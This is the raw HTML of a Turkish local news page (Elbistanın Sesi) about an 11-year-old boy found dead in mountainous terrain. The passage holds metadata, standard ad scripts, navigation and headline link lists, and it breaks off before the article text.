
<!DOCTYPE html> <html lang="tr" class="no-inlinesvgsite-center" itemscope itemtype="http://schema.org/NewsArticle"> <head> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7914883170465839", enable_page_level_ads: true }); </script> <title>Elbistanlı çocuk, dağlık alanda ölü bulundu</title> <meta charset="utf-8"> <!--meta name="viewport" content="width=device-width, initial-scale=1.0"--> <meta name="description" content="Antalya&#039;da ikamet eden Elbistanlı ailenin 11 yaşındaki oğlu kayıp olarak arandığı dağlık arazide ölü bulundu."> <meta name="keywords" content="dağlık alanda ölü bulundu, Elbistanlı çocuk"> <meta name="news_keywords" content="dağlık alanda ölü bulundu, Elbistanlı çocuk"> <meta name="author" content="Elbistanın Sesi" /> <meta property="fb:admins" content=""> <meta property="og:site_name" content="Elbistanın Sesi"> <meta property="og:title" content="Elbistanlı çocuk, dağlık alanda ölü bulundu"> <meta property="og:description" content="Antalya&#039;da ikamet eden Elbistanlı ailenin 11 yaşındaki oğlu kayıp olarak arandığı dağlık arazide ölü bulundu."> <meta property="og:url" content="http://www.elbistaninsesi.com/guncel/elbistanli-cocuk-daglik-alanda-olu-bulundu-h69216.html"> <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2021/02/elbistanli_cocuk_daglik_alanda_olu_bulundu_h69216_e7637.jpg"> <meta property="og:type" content="article"> <meta http-equiv="refresh" content="3000"> <meta name="twitter:card" content="summary_large_image"> <meta name="og:title" content="Elbistanlı çocuk, dağlık alanda ölü bulundu"> <meta name="twitter:url" content="http://www.elbistaninsesi.com/guncel/elbistanli-cocuk-daglik-alanda-olu-bulundu-h69216.html"> <meta name="twitter:domain" content="http://www.elbistaninsesi.com/"> <meta name="twitter:site" content="elbistaninsesi"> <meta name="twitter:title" content="Elbistanlı çocuk, dağlık alanda ölü bulundu"> <meta name="twitter:description" content="Antalya’da ikamet eden Elbistanlı ailenin 11 yaşındaki oğlu, kayıp olarak arandığı dağlık arazide ölü bulundu."> <meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2021/02/elbistanli_cocuk_daglik_alanda_olu_bulundu_h69216_e7637.jpg"> <link rel="alternate" href="http://www.elbistaninsesi.com/" hreflang="tr-default" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print, handheld"> <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" /> <link href="https://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext" rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link href="https://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext" rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=Roboto+Slab:700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link rel="canonical" href=""> <link rel="publisher" href="#" /> <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2021/02/elbistanli_cocuk_daglik_alanda_olu_bulundu_h69216_e7637.jpg" /> <meta itemprop="headline" content="Elbistanlı çocuk, dağlık alanda ölü bulundu" /> <meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/elbistanli_cocuk_daglik_alanda_olu_bulundu_h69216_e7637.jpg" /> <meta itemprop="articleSection" content="Güncel" name="section" /> <meta itemprop="dateCreated" content="2021-02-11T14:10:23+02:00" /> <meta itemprop="dateModified" content="2021-02-11T14:53:18+02:00" /> <meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2021/02/elbistanli_cocuk_daglik_alanda_olu_bulundu_h69216_e7637.jpg" /> <meta itemprop="genre" content="news" name="medium" /> <meta itemprop="inLanguage" content="tr-TR" /> <meta itemprop="keywords" content="dağlık alanda ölü bulundu, Elbistanlı çocuk" name="keywords" /> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .reklam.dikey.sol .fixed { margin-left:-px; } </style> <![endif]--> <script type="text/javascript"> var site_url = 'http://www.elbistaninsesi.com/'; var tema = 'hs-rush-php'; var theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/'; var ajax_url = '_ajax/'; var cat_limit = '10'; var headerayar = 'header_genis'; var poll_voted = ''; var comment_approved = '0'; var doviz = '1'; var lazyload = '0'; var twitter_user = 'elbistaninsesi'; var facebook_user = 'elbistaninsesi'; var popup_saat = '1'; var yorum_harf_ayar = '1'; var hava = '0'; var hava_default = '15888'; var namaz = '1'; var iftara_kalan_sure = '0'; var namaz_default = 'kahramanmaras'; var superlig = '1'; var uye_gir = 'Üye Girişi'; var uye_ol = 'Üye Ol'; var cikis_yap = 'Çıkış Yap'; var baglan_fb = 'Facebook ile Bağlan'; var analitik_ga = 'UA-21655627-1'; </script> <script data-ad-client="pub-3633419220222736" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7533583759274488", enable_page_level_ads: true }); </script> </head> <body> <!-- HEADER --> <div id="siteHeader" class="header fluid row-fluid"> <div id="header-top" class="header-top row-fluid"> <div class="header-top-container"> <div class="header-top-block header-top-cycle"> <div class="header-top-currency"> <div class="currency-cycle"> <div class="currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">7.0233</span></div> <div class="currency-euro glyphicons white euro">EURO <span class="currency-rate">8.5208</span></div> <div class="currency-altin glyphicons white coins">ALTIN <span class="currency-rate">415.961</span></div> <div class="currency-bist glyphicons white global">BIST <span class="currency-rate">1548</span></div> </div> </div> <div class="header-top-hot mleft"> <div class="hot-cycle"> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-asi-programi-ve-vaka-sayilarini-degerlendirdi-h69221.html" title="Kaymakam Demir, aşı programı ve vaka sayılarını değerlendirdi" >Kaymakam Demir, aşı programı ve vaka sayılarını değerlendirdi</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/saadet-partisi-nden-bir-damla-tasarruf-cagrisi-h69220.html" title="Saadet Partisi&#039;nden &#039;&#039;Bir Damla Tasarruf&#039;&#039; çağrısı" >Saadet Partisi&#039;nden &#039;&#039;Bir Damla Tasarruf&#039;&#039; çağrısı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/isgale-karsi-elbistanlilarin-mukarrerati-102-yil-sonra-yeniden-okundu-h69218.html" title="İşgale karşı ‘Elbistanlıların Mukarreratı’ 102 yıl sonra yeniden okundu" >İşgale karşı ‘Elbistanlıların Mukarreratı’ 102 yıl sonra yeniden...</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistanli-cocuk-daglik-alanda-olu-bulundu-h69216.html" title="Elbistanlı çocuk, dağlık alanda ölü bulundu" >Elbistanlı çocuk, dağlık alanda ölü bulundu</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/yarali-sahine-jandarma-sefkati-h69215.html" title="Yaralı şahine jandarma şefkati" >Yaralı şahine jandarma şefkati</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/unal-istiklal-ilham-verir-h69214.html" title="Ünal: “İstiklal ilham verir”" >Ünal: “İstiklal ilham verir”</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/kahramanmaras-milletvekillerinden-kurtulus-coskusu-aciklamasi-h69210.html" title="Kahramanmaraş milletvekillerinden kurtuluş coşkusu açıklaması" >Kahramanmaraş milletvekillerinden kurtuluş coşkusu açıklaması</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistanda-kademeli-yuz-yuze-egitime-gececek-okul-sayisi-belli-oldu-h69209.html" title="Elbistan’da kademeli yüz yüze eğitime geçecek okul sayısı belli oldu" >Elbistan’da kademeli yüz yüze eğitime geçecek okul sayısı belli...</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/komsu-ilcede-sicaklik-rekoru-kirildi-h69208.html" title="Komşu ilçede sıcaklık rekoru kırıldı" >Komşu ilçede sıcaklık rekoru kırıldı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/1ulusal-afsin-fotokampi-duzenlenecek-h69207.html" title="1.Ulusal Afşin Fotokampı düzenlenecek" >1.Ulusal Afşin Fotokampı düzenlenecek</a> </div> </div> </div> </div> <div class="header-top-block header-top-right"> <div class="header-top-user"> <div class="btn-group"> <button class="btn btn-user dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button> <ul id="memberArea" class="dropdown-menu"> </ul> </div> </div> </div> <div id="sb-search" class="header-top-block header-top-search sb-search"> <form action="http://www.elbistaninsesi.com/" method="get"> <input type="hidden" name="m" value="arama"> <input class="sb-search-input" placeholder="Haber Ara ..." type="search" name="q" id="search"> <input type="hidden" name="auth" value="949dd98c784cffe8548187187602140cd19e0e06" /> <input class="sb-search-submit" type="submit" value=""> <span class="sb-icon-search"></span> </form> </div> </div> </div> <div id="logo" class="row-fluid"> <div class="container"> <div class="span3"> <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Elbistanlı çocuk, dağlık alanda ölü bulundu" /></a></span> </div> </div> </div> <div id="menu" class="row-fluid"> <div class="kategori"> <div class="container"> <a href="http://www.elbistaninsesi.com/" class="darken glyphicons home"></a> <a href="http://www.elbistaninsesi.com/yazarlar.html" class="blue glyphicons group">Yazarlar</a> <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" >Vefatlar</a> <a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" class="current" >Güncel</a> <a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2" >Politika</a> <a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4" >Sağlık</a> <a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5" >Eğitim / Kültür</a> <a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1" >Spor</a> <a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3" >Ekonomi</a> <a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9" >Arşiv Özel</a> <a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13" >Seçim Sonucu</a> <a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17" >YEREL</a> <div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">TÜM KATEGORİLER</a></div> <div class="othercat"> <div class="inner"> <div class="clearfix"> <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19" >ASAYİŞ</a> <a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20" >KÜLTÜR-SANAT</a> <a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21" >GENEL</a> <a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22" >DÜNYA</a> <a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48" >EĞİTİM</a> <a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53" >ÇEVRE</a> <a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60" >MAGAZİN</a> <a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71" >HABERDE İNSAN</a> </div> </div> </div> </div> </div> <div id="katicerik" class="row-fluid"> <div class="container"><div class="katelement kat_k7"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/arefe-dogan-81-yasinda-h69217.html" title="Arefe Doğan 81 Yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/arefe_dogan_81_yasinda_h69217_94f6d.jpg" alt="Arefe Doğan 81 Yaşında" /> Arefe Doğan 81 Yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/ayise-firik-78-yasinda-h69213.html" title="Ayişe Firik 78 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/ayise_firik_78_yasinda_h69213_cd2ce.jpg" alt="Ayişe Firik 78 yaşında" /> Ayişe Firik 78 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/aysegul-memur-50-yasinda-h69212.html" title="Ayşegül Memur 50 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Ayşegül Memur 50 yaşında" /> Ayşegül Memur 50 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/anma-osman-sacan-h69211.html" title="Anma / Osman Saçan"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/anma_osman_sacan_h69211_ce0b0.jpg" alt="Anma / Osman Saçan" /> Anma / Osman Saçan</a> </div> </div></div><div class="katelement kat_k8"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-asi-programi-ve-vaka-sayilarini-degerlendirdi-h69221.html" title="Kaymakam Demir, aşı programı ve vaka sayılarını değerlendirdi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/kaymakam_demir_asi_programi_ve_vaka_sayilarini_degerlendirdi_h69221_c9348.jpg" alt="Kaymakam Demir, aşı programı ve vaka sayılarını değerlendirdi" /> Kaymakam Demir, aşı programı ve vaka sayılarını değerlendirdi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/saadet-partisi-nden-bir-damla-tasarruf-cagrisi-h69220.html" title="Saadet Partisi&#039;nden &#039;&#039;Bir Damla Tasarruf&#039;&#039; çağrısı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/saadet_partisi_nden_bir_damla_tasarruf_cagrisi_h69220_0dc55.jpg" alt="Saadet Partisi&#039;nden &#039;&#039;Bir Damla Tasarruf&#039;&#039; çağrısı" /> Saadet Partisi&#039;nden &#039;&#039;Bir Damla Tasarruf&#039;&#039; çağrısı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/isgale-karsi-elbistanlilarin-mukarrerati-102-yil-sonra-yeniden-okundu-h69218.html" title="İşgale karşı ‘Elbistanlıların Mukarreratı’ 102 yıl sonra yeniden okundu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/isgale_karsi_elbistanlilarin_mukarrerati_102_yil_sonra_yeniden_okundu_h69218_74da3.jpg" alt="İşgale karşı ‘Elbistanlıların Mukarreratı’ 102 yıl sonra yeniden okundu" /> İşgale karşı ‘Elbistanlıların Mukarreratı’ 102 yıl sonra yeniden okundu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/elbistanli-cocuk-daglik-alanda-olu-bulundu-h69216.html" title="Elbistanlı çocuk, dağlık alanda ölü bulundu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/02/elbistanli_cocuk_daglik_alanda_olu_bulundu_h69216_e7637.jpg" alt="Elbistanlı çocuk, dağlık alanda ölü bulundu" /> Elbistanlı çocuk, dağlık alanda ölü bulundu</a> </div> </div></div><div class="katelement kat_k2"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/iyi-partide-mevcut-baskan-huseyin-gul-guven-tazeledi-h66989.html" title="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/06/iyi_partide_mevcut_baskan_huseyin_gul_guven_tazeledi_h66989_4ef72.JPG" alt="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi" /> İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/ak-parti-ilce-baskan-adayi-tirastan-aciklama-h66803.html" title="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/05/ak_parti_ilce_baskan_adayi_tirastan_aciklama_h66803_4a4d1.jpg" alt="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama" /> AK Parti İlçe Başkan Adayı Tıraş’tan açıklama</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/baskan-sungur-kongrede-yeniden-aday-olmayacagini-acikladi-h65800.html" title="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/baskan_sungur_kongrede_yeniden_aday_olmayacagini_acikladi_h65800_70585.jpeg" alt="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı" /> Başkan Sungur kongrede yeniden aday olmayacağını açıkladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" /> MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a> </div> </div></div><div class="katelement kat_k4"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" /> Crown Dental hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" /> Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" /> Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" /> EDH, obezite cerrahisinde söz sahibi olmaya başladı</a> </div> </div></div><div class="katelement kat_k5"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" /> Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" /> Otizmli çocuklar için özel etkinlik</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" /> Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" /> Nurhak Kaymakamlığı’ndan eğitime özel destek</a> </div> </div></div><div class="katelement kat_k1"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-kadin-voleybol-takimi-ankaradan-puansiz-dondu-h65794.html" title="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistanspor_kadin_voleybol_takimi_ankaradan_puansiz_dondu_h65794_499a5.jpg" alt="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü" /> Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" /> Filenin sultanları, Nevşehir’i ağırlayacak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" /> PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" /> Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a> </div> </div></div><div class="katelement kat_k3"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/mikrokredi-destegi-koronavirus-doneminde-de-devam-ediyor-h67098.html" title="Mikrokredi desteği koronavirüs döneminde de devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/mikrokredi_destegi_koronavirus_doneminde_de_devam_ediyor_h67098_5fc86.jpg" alt="Mikrokredi desteği koronavirüs döneminde de devam ediyor" /> Mikrokredi desteği koronavirüs döneminde de devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" /> Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" /> ETSO ve TEB kredi protokolü imzaladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" /> DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a> </div> </div></div><div class="katelement kat_k9"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" /> 17 EKİM 1968 PAZARTESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" /> 13 EKİM 1968 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" /> 17 AĞUSTOS 1967 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" /> 30 MAYIS 1959 CUMARTESİ</a> </div> </div></div><div class="katelement kat_k13"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" /> 16 Nisan 2017 Anayasa Değişikliği Referandumu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" /> 1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" /> 7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"></div></div><div class="katelement kat_k17"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" /> KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img 